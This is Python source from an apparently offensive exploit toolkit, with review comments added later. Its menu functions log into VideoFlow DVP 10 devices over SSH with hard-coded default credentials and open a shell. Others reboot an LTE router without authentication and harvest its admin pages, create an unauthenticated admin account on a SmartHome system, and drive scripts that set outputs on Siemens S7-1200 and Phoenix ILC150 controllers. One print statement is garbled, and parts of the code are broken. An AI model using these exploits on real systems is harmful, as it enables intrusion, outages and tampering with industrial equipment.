def exploit4():
    """Menu action: try the built-in SSH accounts of a VideoFlow DVP 10 unit.

    Prompts for a target address, then attempts an SSH login (via paramiko)
    with every combination of the user names and passwords hard-coded below.
    On the first successful login the session is passed to ``ssh_shell`` and
    control goes back to the main menu; if no combination works, a failure
    message is printed.

    Review notes (what the visible code implies for a defender):
      * The check depends entirely on fixed credentials embedded in this
        file, so it can only succeed where those built-in accounts are still
        enabled and reachable over SSH.  Rotating or disabling them and
        restricting SSH reachability removes the exposure.
      * Every attempt is a normal SSH authentication for ``root`` or ``mom``;
        a short burst of such attempts from one source is what authentication
        logs on the device would be expected to show (inferred, not
        established by this file).
    """
    try:
        import paramiko
    except ImportError:
        print(warna.merah + "\n[x] " + warna.tutup + "Error, please install paramiko module. ($ pip2 install paramiko)\n")
        sys.exit()
    from paramiko.ssh_exception import BadHostKeyException, AuthenticationException, SSHException
    IP()
    print(warna.kuning + "\n[!]" + warna.tutup + " VideoFlow Digital Video Protection DVP 10 Authenticated Remote Code Execution")
    print(warna.kuning + "[!]" + warna.tutup + " Affected version : 2.10 (X-Prototype-Version: 1.6.0.2)")
    ssh = paramiko.SSHClient()
    # AutoAddPolicy accepts whatever host key the server presents, so the
    # identity of the remote end is never verified.
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    _host = raw_input(warna.biru + "\n[+]" + warna.tutup + " Target ip address" + warna.kuning + " >> " + warna.tutup)
    # NOTE(review): the log file name is built from the raw input here,
    # before the ipv4() validation further down has run.
    paramiko.util.log_to_file("%s/%s.log" % (txtool_dir, _host))
    _user = ["""root""", """mom"""]
    _connection = None
    p = ["""videoflow""", """$1$CGgdGXXG$0FmyyKMzcHgkKnUTZi5r./"""]
    _passwords = [line.strip() for line in p]
    _username = [line.strip() for line in _user]
    # `_passwords and _username` evaluates to `_username` because both lists
    # are non-empty, so this is range(2): the inner loop runs at most twice
    # per user/password pair.
    _retries = range(len(_passwords and _username))
    true_ip = ipv4(_host)
    if _host == '':
        empty()
        BACK.menu['menu_utama']()
    if not true_ip:
        print(warna.merah + "\n[x] " + warna.tutup + "incorrect IP address")
        BACK.menu['menu_utama']()
    print(warna.hijau + "\n[*] " + warna.tutup + "Trying to login...")
    for _pass in _passwords:
        for _u in _username:
            try:
                for x in _retries:
                    ssh.connect(_host, username=_u, password=_pass, timeout=5)
                    # connect() raises on failure, so reaching this line
                    # means the login was accepted.
                    _connection = True
                    if _connection:
                        # NOTE(review): the next statement is damaged in the
                        # source (values masked as ****** and the text between
                        # them lost).  It is kept verbatim and not
                        # reconstructed; `command`, used right after it, is
                        # never assigned in the text that survives.
                        print(warna.hijau + "[*] " + warna.tutup + "Login Success! user: "******" and password: "******"[*] " + warna.tutup + "shell has been successfully opened\n")
                        ssh_shell(command)
                        command.close()
                        ssh.close()
                        finish_exploit()
                        BACK.menu['menu_utama']()
            except (BadHostKeyException, AuthenticationException, SSHException, socket.error) as err:
                # A rejected login or transport error is reported and the
                # next credential pair is tried after a one-second pause.
                print warna.merah + "[x] " + warna.tutup + "An error occured:" ,err
                time.sleep(1)
    print(warna.merah + "\n[x] " + warna.tutup + "Failed to login, maybe target not vuln")
    raw_input(" press <" + warna.hijau + "Enter" + warna.tutup + "> to continue ")
    BACK.menu['menu_utama']()
def menu9():
    """Menu action: run the bundled ILC150 helper script against one address.

    Asks for an IPv4 address, returns to the main menu when the input is
    empty or rejected by ``ipv4()``, and otherwise launches
    ``PhoenixControlPLC-ILC150.py`` from ``path`` with the address as its
    only argument, waits for it and exits the program.

    Review notes:
      * The command line is assembled as a string and run with
        ``shell=True``; the only thing standing between the typed value and
        the shell is the ``ipv4()`` check (its strictness is not visible
        here -- confirm).
      * What the helper script does to the controller is outside this
        block; the banner text is the only description available here.
    """
    IP()
    notice = warna.kuning + "\n[!]" + warna.tutup
    print(notice + " Print out CPU status and reverts it, tested and working on ILC150 (at least partially working on others")
    prompt = warna.biru + "\n[+]" + warna.tutup + " ip address" + warna.kuning + " >> " + warna.tutup
    ip = raw_input(prompt)
    # Validation runs before the empty-input test, exactly as in the
    # original ordering.
    true_ip = ipv4(ip)

    if ip == '':
        empty()
        back.menu['menu_utama']()
        return

    if not true_ip:
        rejected = warna.merah + "\n[x] " + warna.tutup
        print(rejected + "Incorrect ip address, txtool will be assume exploitation is canceled")
        raw_input(" press <" + warna.hijau + "Enter" + warna.tutup + "> to continue ")
        back.menu['menu_utama']()
        return

    command_line = "%s/PhoenixControlPLC-ILC150.py %s " % (path, ip)
    helper = subprocess.Popen(command_line, shell=True)
    helper.wait()
    sys.exit()
def exploit2():
    """Menu action for the router issues described in the banners below.

    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience
    source: https://www.exploit-db.com/exploits/43402/
    Written in python by Kuburan

    The function shows a three-entry sub-menu:
      1 -- send a single unauthenticated GET to
           ``/cgi-bin/lte.cgi?Command=Reboot`` and inspect the reply;
      2 -- request a fixed list of administrative pages without credentials
           and append the URL of every page that answered with a non-error
           status to ``<target>/target.txt``;
      0 -- go back to the main menu.

    Review notes (defender's reading of the visible code):
      * Both actions rely on the device answering management URLs without
        any session or credential; none is sent by this code.
      * On the device side the second action is a burst of GETs for the
        paths listed in the loop below from one client.  Limiting who can
        reach the management interface and updating the firmware named in
        the banner are the obvious mitigations (general advice; this file
        does not name a fixed version).
      * Only the URLs are recorded, never the page contents.
    """
    IP()
    print("\n\t[" + warna.hijau + "1" + warna.tutup + "]" + warna.abuabu + " Denial Of Service" + warna.tutup)
    print("\t[" + warna.hijau + "2" + warna.tutup + "]" + warna.abuabu + " Information Disclosure" + warna.tutup)
    print("\t[" + warna.hijau + "0" + warna.tutup + "]" + warna.abuabu + " Back" + warna.tutup)
    choise = raw_input(warna.biru + "\n[+]" + warna.tutup + " Select An action" + warna.kuning + " >> " + warna.tutup)
    if choise == '':
        empty()
        BACK.menu['menu_utama']()
    if choise == '1':
        print(warna.kuning + "\n[!]" + warna.tutup + " The router suffers from an unauthenticated reboot command execution. Attackers can exploit this issue to cause a denial of service scenario.")
        print(warna.kuning + "[!]" + warna.tutup + " Affected version:\n\tFwVer: SDT-CS3B1, sw version 1.2.0\n\tLteVer: ML300S5XEA41_090 1 0.1.0\n\tModem model: PM-L300S")
        target = raw_input(warna.biru + "\n[+]" + warna.tutup + " ip address of Router device" + warna.kuning + " >> " + warna.tutup)
        true_ip = ipv4(target)
        if target == '':
            empty()
            BACK.menu['menu_utama']()
        if not true_ip:
            print(warna.merah + "\n[x] " + warna.tutup + "Warning. wrong ip address, txtool will be assume exploitation is canceled")
            raw_input(" press <" + warna.hijau + "Enter" + warna.tutup + "> to continue ")
            BACK.menu['menu_utama']()
        # NOTE(review): the port is used as typed; only emptiness is checked.
        port = raw_input(warna.biru + "\n[+]" + warna.tutup + " port of Router device" + warna.kuning + " >> " + warna.tutup)
        if port == '':
            empty()
            BACK.menu['menu_utama']()
        else:
            try:
                print warna.hijau + "\n[*] " + warna.tutup + "Sending reboot command..."
                site = ("http://%s:%s/cgi-bin/lte.cgi?Command=Reboot" % (target, port))
                # No timeout is passed here, unlike every request in the
                # information-disclosure branch.
                req = requests.get(site)
                body = req.content
                print warna.hijau + "\n[*] " + warna.tutup + body
                # An empty <xml></xml> reply is treated as acknowledgement.
                if "<xml>\n</xml>" in body:
                    print warna.hijau + "[*] " + warna.tutup + "Router should be rebooted."
                    finish_exploit()
                    BACK.menu['menu_utama']()
                else:
                    print warna.kuning + "[!] " + warna.tutup + "maybe attack unsuccessfull."
                    raw_input(" press <" + warna.hijau + "Enter" + warna.tutup + "> to continue ")
                    BACK.menu['menu_utama']()
            except requests.exceptions.RequestException as err:
                print warna.merah + "\n[x] " + warna.tutup + "An error occured:" ,err
                raw_input(" press <" + warna.hijau + "Enter" + warna.tutup + "> to continue ")
                BACK.menu['menu_utama']()
            except KeyError:
                # Silently ignored; presumably guards the menu lookup.
                pass
    elif choise == '2':
        print(warna.kuning + "\n[!]" + warna.tutup + " Insecure direct object references occured when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources and functionalities in the system.")
        print(warna.kuning + "[!]" + warna.tutup + " Affected version:\n\tFwVer: SDT-CS3B1, sw version 1.2.0\n\tLteVer: ML300S5XEA41_090 1 0.1.0\n\tModem model: PM-L300S")
        target = raw_input(warna.biru + "\n[+]" + warna.tutup + " ip address of Router device" + warna.kuning + " >> " + warna.tutup)
        true_ip = ipv4(target)
        if target == '':
            empty()
            BACK.menu['menu_utama']()
        if not true_ip:
            print(warna.merah + "\n[x] " + warna.tutup + "Warning. wrong ip address, txtool will be assume exploitation is canceled")
            raw_input(" press <" + warna.hijau + "Enter" + warna.tutup + "> to continue ")
            BACK.menu['menu_utama']()
        else:
            # Sixteen near-identical probes follow.  Each one: build the URL,
            # GET it with a 10 s timeout, let raise_for_status() turn 4xx/5xx
            # into an exception, and on success append the URL to target.txt.
            # `ok` holds the integer status code, so `if ok:` is always true
            # once raise_for_status() has returned.
            #
            # The file is written through os.system() with `target`
            # interpolated into a shell command; this branch is only reached
            # when ipv4(target) was truthy (assumes ipv4() is strict --
            # confirm).  The output path is hard-coded to the Termux home
            # directory, while the closing message refers to $HOME.
            #
            # The loop ends via `break` after the last probe succeeds; when
            # the last probe fails the handler returns to the main menu.
            while True:
                url1 = ("http://%s/nas/smbsrv.shtml" % (target))
                try:
                    print(warna.hijau + "\n[*] " + warna.tutup + "Attempt to get Samba server settings information...")
                    page1 = requests.get(url1, timeout=10)
                    ok = page1.status_code
                    page1.raise_for_status()
                    print warna.hijau + "\n[*] " + warna.tutup + "Status:" ,page1.status_code
                    if ok:
                        # The per-target output directory is created here only.
                        os.system("mkdir -p /data/data/com.termux/files/home/.txtool/%s" % target)
                        os.system("""echo "http://%s/nas/smbsrv.shtml" >> /data/data/com.termux/files/home/.txtool/%s/target.txt""" % (target, target))
                except requests.exceptions.RequestException as a:
                    print warna.merah + "\n[x] " + warna.tutup + "An error occured:" ,a
                    pass
                url2 = ("http://%s/nas/ftpsrv.shtml" % (target))
                try:
                    print(warna.hijau + "\n[*] " + warna.tutup + "Attempt to get FTP settings information...")
                    page2 = requests.get(url2, timeout=10)
                    ok = page2.status_code
                    page2.raise_for_status()
                    print warna.hijau + "\n[*] " + warna.tutup + "Status:" ,page2.status_code
                    if ok:
                        os.system("""echo "http://%s/nas/ftpsrv.shtml" >> /data/data/com.termux/files/home/.txtool/%s/target.txt""" % (target, target))
                except requests.exceptions.RequestException as b:
                    print warna.merah + "\n[x] " + warna.tutup + "An error occured:" ,b
                    pass
                url3 = ("http://%s/wifi2g/basic.shtml" % (target))
                try:
                    print(warna.hijau + "\n[*] " + warna.tutup + "Attempt to get Wireless settings information...")
                    page3 = requests.get(url3, timeout=10)
                    ok = page3.status_code
                    page3.raise_for_status()
                    print warna.hijau + "\n[*] " + warna.tutup + "Status:" ,page3.status_code
                    if ok:
                        os.system("""echo "http://%s/wifi2g/basic.shtml" >> /data/data/com.termux/files/home/.txtool/%s/target.txt""" % (target, target))
                except requests.exceptions.RequestException as c:
                    print warna.merah + "\n[x] " + warna.tutup + "An error occured:" ,c
                    pass
                url4 = ("http://%s/admin/status.shtml" % (target))
                try:
                    print(warna.hijau + "\n[*] " + warna.tutup + "Attempt to get Access point status information...")
                    page4 = requests.get(url4, timeout=10)
                    ok = page4.status_code
                    page4.raise_for_status()
                    print warna.hijau + "\n[*] " + warna.tutup + "Status:" ,page4.status_code
                    if ok:
                        os.system("""echo "http://%s/admin/status.shtml" >> /data/data/com.termux/files/home/.txtool/%s/target.txt""" % (target, target))
                except requests.exceptions.RequestException as d:
                    print warna.merah + "\n[x] " + warna.tutup + "An error occured:" ,d
                    pass
                url5 = ("http://%s/internet/wan.shtml" % (target))
                try:
                    print(warna.hijau + "\n[*] " + warna.tutup + "Attempt to get WAN settings information...")
                    page5 = requests.get(url5, timeout=10)
                    ok = page5.status_code
                    page5.raise_for_status()
                    print warna.hijau + "\n[*] " + warna.tutup + "Status:" ,page5.status_code
                    if ok:
                        os.system("""echo "http://%s/internet/wan.shtml" >> /data/data/com.termux/files/home/.txtool/%s/target.txt""" % (target, target))
                except requests.exceptions.RequestException as e:
                    print warna.merah + "\n[x] " + warna.tutup + "An error occured:" ,e
                    pass
                url6 = ("http://%s/internet/lan.shtml" % (target))
                try:
                    print(warna.hijau + "\n[*] " + warna.tutup + "Attempt to get LAN settings information...")
                    page6 = requests.get(url6, timeout=10)
                    ok = page6.status_code
                    page6.raise_for_status()
                    print warna.hijau + "\n[*] " + warna.tutup + "Status:" ,page6.status_code
                    if ok:
                        os.system("""echo "http://%s/internet/lan.shtml" >> /data/data/com.termux/files/home/.txtool/%s/target.txt""" % (target, target))
                except requests.exceptions.RequestException as f:
                    print warna.merah + "\n[x] " + warna.tutup + "An error occured:" ,f
                    pass
                url7 = ("http://%s/admin/statistic.shtml" % (target))
                try:
                    print(warna.hijau + "\n[*] " + warna.tutup + "Attempt to get System statistics information...")
                    page7 = requests.get(url7, timeout=10)
                    ok = page7.status_code
                    page7.raise_for_status()
                    print warna.hijau + "\n[*] " + warna.tutup + "Status:" ,page7.status_code
                    if ok:
                        os.system("""echo "http://%s/admin/statistic.shtml" >> /data/data/com.termux/files/home/.txtool/%s/target.txt""" % (target, target))
                except requests.exceptions.RequestException as g:
                    print warna.merah + "\n[x] " + warna.tutup + "An error occured:" ,g
                    pass
                url8 = ("http://%s/admin/management.shtml" % (target))
                try:
                    print(warna.hijau + "\n[*] " + warna.tutup + "Attempt to get System management information...")
                    page8 = requests.get(url8, timeout=10)
                    ok = page8.status_code
                    page8.raise_for_status()
                    print warna.hijau + "\n[*] " + warna.tutup + "Status:" ,page8.status_code
                    if ok:
                        os.system("""echo "http://%s/admin/management.shtml" >> /data/data/com.termux/files/home/.txtool/%s/target.txt""" % (target, target))
                except requests.exceptions.RequestException as h:
                    print warna.merah + "\n[x] " + warna.tutup + "An error occured:" ,h
                    pass
                url9 = ("http://%s/serial/serial_direct.shtml" % (target))
                try:
                    print(warna.hijau + "\n[*] " + warna.tutup + "Attempt to get Direct serial settings information...")
                    page9 = requests.get(url9, timeout=10)
                    ok = page9.status_code
                    page9.raise_for_status()
                    print warna.hijau + "\n[*] " + warna.tutup + "Status:" ,page9.status_code
                    if ok:
                        os.system("""echo "http://%s/serial/serial_direct.shtml" >> /data/data/com.termux/files/home/.txtool/%s/target.txt""" % (target, target))
                except requests.exceptions.RequestException as i:
                    print warna.merah + "\n[x] " + warna.tutup + "An error occured:" ,i
                    pass
                url10 = ("http://%s/admin/system_command.shtml" % (target))
                try:
                    print(warna.hijau + "\n[*] " + warna.tutup + "Attempt to get System command interface...")
                    page10 = requests.get(url10, timeout=10)
                    ok = page10.status_code
                    page10.raise_for_status()
                    print warna.hijau + "\n[*] " + warna.tutup + "Status:" ,page10.status_code
                    if ok:
                        os.system("""echo "http://%s/admin/system_command.shtml" >> /data/data/com.termux/files/home/.txtool/%s/target.txt""" % (target, target))
                except requests.exceptions.RequestException as j:
                    print warna.merah + "\n[x] " + warna.tutup + "An error occured:" ,j
                    pass
                url11 = ("http://%s/internet/dhcpcliinfo.shtml" % (target))
                try:
                    print(warna.hijau + "\n[*] " + warna.tutup + "Attempt to get DHCP Clients information...")
                    page11 = requests.get(url11, timeout=10)
                    ok = page11.status_code
                    page11.raise_for_status()
                    print warna.hijau + "\n[*] " + warna.tutup + "Status:" ,page11.status_code
                    if ok:
                        os.system("""echo "http://%s/internet/dhcpcliinfo.shtml" >> /data/data/com.termux/files/home/.txtool/%s/target.txt""" % (target, target))
                except requests.exceptions.RequestException as k:
                    print warna.merah + "\n[x] " + warna.tutup + "An error occured:" ,k
                    pass
                url12 = ("http://%s/admin/upload_firmware.shtml" % (target))
                try:
                    print(warna.hijau + "\n[*] " + warna.tutup + "Attempt to get Router firmware information...")
                    page12 = requests.get(url12, timeout=10)
                    ok = page12.status_code
                    page12.raise_for_status()
                    print warna.hijau + "\n[*] " + warna.tutup + "Status:" ,page12.status_code
                    if ok:
                        os.system("""echo "http://%s/admin/upload_firmware.shtml" >> /data/data/com.termux/files/home/.txtool/%s/target.txt""" % (target, target))
                except requests.exceptions.RequestException as l:
                    print warna.merah + "\n[x] " + warna.tutup + "An error occured:" ,l
                    pass
                url13 = ("http://%s/firewall/vpn_futuresystem.shtml" % (target))
                try:
                    print(warna.hijau + "\n[*] " + warna.tutup + "Attempt to get VPN settings information...")
                    page13 = requests.get(url13, timeout=10)
                    ok = page13.status_code
                    page13.raise_for_status()
                    print warna.hijau + "\n[*] " + warna.tutup + "Status:" ,page13.status_code
                    if ok:
                        os.system("""echo "http://%s/firewall/vpn_futuresystem.shtml" >> /data/data/com.termux/files/home/.txtool/%s/target.txt""" % (target, target))
                except requests.exceptions.RequestException as m:
                    print warna.merah + "\n[x] " + warna.tutup + "An error occured:" ,m
                    pass
                url14 = ("http://%s/cgi-bin/lte.cgi?Command=getUiccState" % (target))
                try:
                    print(warna.hijau + "\n[*] " + warna.tutup + "Attempt to get GetUiccState() information...")
                    page14 = requests.get(url14, timeout=10)
                    ok = page14.status_code
                    page14.raise_for_status()
                    print warna.hijau + "\n[*] " + warna.tutup + "Status:" ,page14.status_code
                    if ok:
                        os.system("""echo "http://%s/cgi-bin/lte.cgi?Command=getUiccState" >> /data/data/com.termux/files/home/.txtool/%s/target.txt""" % (target, target))
                except requests.exceptions.RequestException as n:
                    print warna.merah + "\n[x] " + warna.tutup + "An error occured:" ,n
                    pass
                url15 = ("http://%s/cgi-bin/lte.cgi?Command=getModemStatus" % (target))
                try:
                    print(warna.hijau + "\n[*] " + warna.tutup + "Attempt to get Modem status information...")
                    page15 = requests.get(url15, timeout=10)
                    ok = page15.status_code
                    page15.raise_for_status()
                    print warna.hijau + "\n[*] " + warna.tutup + "Status:" ,page15.status_code
                    if ok:
                        os.system("""echo "http://%s/cgi-bin/lte.cgi?Command=getModemStatus" >> /data/data/com.termux/files/home/.txtool/%s/target.txt""" % (target, target))
                except requests.exceptions.RequestException as o:
                    print warna.merah + "\n[x] " + warna.tutup + "An error occured:" ,o
                    pass
                url16 = ("http://%s/cgi-bin/systemutil.cgi?Command=SystemInfo" % (target))
                try:
                    print(warna.hijau + "\n[*] " + warna.tutup + "Attempt to get System information...")
                    page16 = requests.get(url16, timeout=10)
                    ok = page16.status_code
                    page16.raise_for_status()
                    print warna.hijau + "\n[*] " + warna.tutup + "Status:" ,page16.status_code
                    if ok:
                        os.system("""echo "http://%s/cgi-bin/systemutil.cgi?Command=SystemInfo" >> /data/data/com.termux/files/home/.txtool/%s/target.txt""" % (target, target))
                    # Leaves the while-loop; the source text does not show
                    # whether this sat inside `if ok:` -- equivalent either
                    # way, since `ok` is truthy at this point.
                    break
                except requests.exceptions.RequestException as p:
                    print warna.merah + "\n[x] " + warna.tutup + "An error occured:" ,p
                    print warna.merah + "\n[x] " + warna.tutup + "To many error occured, finish crawling."
                    raw_input(" press <" + warna.hijau + "Enter" + warna.tutup + "> to continue ")
                    BACK.menu['menu_utama']()
            print(warna.hijau + "\n[*] " + warna.tutup + "Crawl result has been saved to $HOME/.txtool/%s/target.txt" % (target))
            finish_exploit()
            BACK.menu['menu_utama']()
    elif choise == '0':
        BACK.menu['menu_utama']()
    else:
        print warna.merah + "\n[x] " + warna.tutup + "Wrong command."
        BACK.menu['menu_utama']()
def exploit3():
    """Menu action: issue the account-creation request described in the banner.

    Collects a target address, a user name and a password, then sends one
    GET to ``/content/new_user.php`` on port 9000 with those values and
    ``group_id=1`` in the query string.  No credential or session is sent
    with the request.  Success is judged only by the HTTP status; the code
    never checks that an account actually exists afterwards.

    Review notes (defender's reading of the visible code):
      * A request for ``/content/new_user.php`` carrying ``user_name``,
        ``password`` and ``group_id`` parameters from a client with no prior
        login is the trace this leaves in the device's web log, and the
        chosen password travels in clear text in the URL.
      * The banner states "4.20 and older" as affected; updating past that
        and restricting access to the port are the mitigations that follow
        from it (general advice, not stated in this file).
      * Once ``raise_for_status()`` has returned, ``ok`` is necessarily
        true, so the "Failed to add new users" branch is not reachable in
        practice.
    """
    try:
        IP()
        warn, ask, reset = warna.kuning, warna.biru, warna.tutup
        print(warn + "\n[!]" + reset + " the Vulnerability allow unauthenticated attacker to remotely bypass authentication and added new user.")
        print(warn + "[!]" + reset + " Affected version : 4.20 and older")

        host = raw_input(ask + "\n[+]" + reset + " ip address of SmartHome device" + warn + " >> " + reset)
        host_is_ipv4 = ipv4(host)
        if host == '':
            empty()
            BACK.menu['menu_utama']()
        if not host_is_ipv4:
            print(warna.merah + "\n[x] " + reset + "incorrect IP address")
            BACK.menu['menu_utama']()

        port = '9000'

        print(warn + "\n[!]" + reset + " Make your own username")
        user = raw_input(ask + "[+]" + reset + " Username" + warn + " >> " + reset)
        if user == '':
            empty()
            BACK.menu['menu_utama']()

        print(warn + "\n[!]" + reset + " Make your own password")
        password = raw_input(ask + "[+]" + reset + " Password" + warn + " >> " + reset)
        if password == '':
            empty()
            BACK.menu['menu_utama']()

        # Values are placed into the query string exactly as typed.
        endpoint = "http://%s:%s/content/new_user.php?user_name=%s&password=%s&group_id=1" % (host, port, user, password)
        response = requests.get(endpoint, timeout=10)
        response.status_code
        response.raise_for_status()

        if not response.ok:
            print(warna.merah + "\n[x] " + reset + "Failed to add new users, it looks like your target is not a SmartHome System")
            raw_input(" press <" + warna.hijau + "Enter" + reset + "> to continue ")
            BACK.menu['menu_utama']()
        else:
            print(warna.hijau + "\n[*] " + reset + "Successfully added new users")
            print("\n username : %s" % (user))
            print(" password : %s" % (password))
            print(" login page : http://%s:%s/content/smarthome.php" % (host, port))
            finish_exploit()
            BACK.menu['menu_utama']()
    except requests.exceptions.RequestException as failure:
        # One handler instead of four: the label is chosen in the same
        # precedence order the separate except clauses used.
        if isinstance(failure, requests.exceptions.HTTPError):
            label = " Http Error : "
        elif isinstance(failure, requests.exceptions.ConnectionError):
            label = " Error Connecting : "
        elif isinstance(failure, requests.exceptions.Timeout):
            label = " Timeout Error : "
        else:
            label = ""
        print warna.merah + "\n[x]" + warna.tutup + label, failure
        raw_input(" press <" + warna.hijau + "Enter" + warna.tutup + "> to continue ")
        BACK.menu['menu_utama']()
def menu10():
    """Menu action: run the bundled S7-1200 helper script with typed options.

    Prompts for an address, a port (empty means "102"), a merker string and
    an output string, then launches ``S7-1200-Workshop.py`` from ``path``
    with ``-t``/``-p`` and, depending on which answers were left empty,
    ``-r``, ``-o`` and/or ``-m``.  Every branch waits for the helper, calls
    ``finish_exploit()``, returns to the main menu and exits.

    Review notes:
      * Only ``ip`` is checked (via ``ipv4()``); ``port``, ``merker`` and
        ``output`` are interpolated into a command string that is run with
        ``shell=True`` exactly as typed.
      * If ``back.menu['menu_utama']()`` returns after a rejected address,
        execution continues below with that rejected value.
      * What the helper script does with these options is outside this
        block; the banner text is the only description available here.
    """
    IP()
    print( warna.kuning + "\n[!]" + warna.tutup + " reading inputs, setting outputs, and merkers of for Siemens S7-1200 (firmware <= v3)" )
    ip = raw_input(warna.biru + "\n[+]" + warna.tutup + " ip address" + warna.kuning + " >> " + warna.tutup)
    true_ip = ipv4(ip)
    if ip == '':
        empty()
        back.menu['menu_utama']()
    elif not true_ip:
        print( warna.merah + "\n[x] " + warna.tutup + "Incorrect ip address, txtool will be assume exploitation is canceled" )
        raw_input(" press <" + warna.hijau + "Enter" + warna.tutup + "> to continue ")
        back.menu['menu_utama']()
    print(warna.kuning + "\n[!]" + warna.tutup + " The default port is 102")
    port = raw_input(warna.biru + "[+]" + warna.tutup + " port number" + warna.kuning + " >> " + warna.tutup)
    # An empty answer is replaced by the default right away, so `port` can
    # never be '' in the checks further down.
    if port == "":
        port = "102"
    print(warna.kuning + '\n[!]' + warna.tutup + ' Example : "10101010,3" to set merkers 3.0 through 3.7')
    merker = raw_input(warna.biru + "[+]" + warna.tutup + " Set the merkers" + warna.kuning + " >> " + warna.tutup)
    print(warna.kuning + '\n[!] ' + warna.tutup + 'Example set output : "00000000"')
    output = raw_input(warna.biru + "[+] " + warna.tutup + "Set outputs" + warna.kuning + " >> " + warna.tutup)
    # The next three tests all require port == '', which the normalisation
    # above rules out; they are unreachable as written.
    if output == '' and merker == '' and port == '':
        subprocess.Popen("%s/S7-1200-Workshop.py -t %s -p 102 -r " % (path, ip), shell=True).wait()
        finish_exploit()
        back.menu['menu_utama']()
        sys.exit()
    if port == '' and merker == '':
        subprocess.Popen("%s/S7-1200-Workshop.py -t %s -p 102 -o %s " % (path, ip, output), shell=True).wait()
        finish_exploit()
        back.menu['menu_utama']()
        sys.exit()
    if port == '' and output == '':
        subprocess.Popen("%s/S7-1200-Workshop.py -t %s -p 102 -m %s " % (path, ip, merker), shell=True).wait()
        finish_exploit()
        back.menu['menu_utama']()
        sys.exit()
    elif merker == '' and output == '':
        # Neither value given: the helper is started with -r only.
        subprocess.Popen("%s/S7-1200-Workshop.py -t %s -p %s -r " % (path, ip, port), shell=True).wait()
        finish_exploit()
        back.menu['menu_utama']()
        sys.exit()
    elif merker == '':
        subprocess.Popen("%s/S7-1200-Workshop.py -t %s -p %s -o %s " % (path, ip, port, output), shell=True).wait()
        finish_exploit()
        back.menu['menu_utama']()
        sys.exit()
    elif output == '':
        # NOTE(review): `marker` is not assigned anywhere in this function
        # (the prompt above binds `merker`); unless a module-level `marker`
        # exists, this line raises NameError.
        subprocess.Popen("%s/S7-1200-Workshop.py -t %s -p %s -m %s " % (path, ip, port, marker), shell=True).wait()
        finish_exploit()
        back.menu['menu_utama']()
        sys.exit()
    else:
        subprocess.Popen("%s/S7-1200-Workshop.py -t %s -p %s -o %s -m %s " % (path, ip, port, output, merker), shell=True).wait()
        finish_exploit()
        back.menu['menu_utama']()
        sys.exit()